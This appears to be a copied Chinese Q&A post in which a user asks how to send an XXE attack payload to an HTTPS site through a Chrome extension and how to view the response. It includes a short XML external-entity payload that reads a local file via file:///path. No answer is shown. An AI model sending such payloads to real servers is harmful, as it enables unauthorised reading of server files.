如何解决我想通过提供 DTD 脚本来执行 XXE 攻击,通过 Chrome 扩展程序获取、发布请求我怎样才能做到这一点?
我需要通过提供 DTD 脚本来执行 XXE 攻击,以通过 Chrome 扩展程序获取、发布请求。 url 是 HTTPS,所以不能使用 burp 套件或任何其他工具进行 xxe 攻击。 我如何通过 chrome 扩展来实现这一点?哪个最好?以及如何查看攻击的响应?
The DTD script is
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYstem "file:///path">
]>
<foo>&xxe;</foo>
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。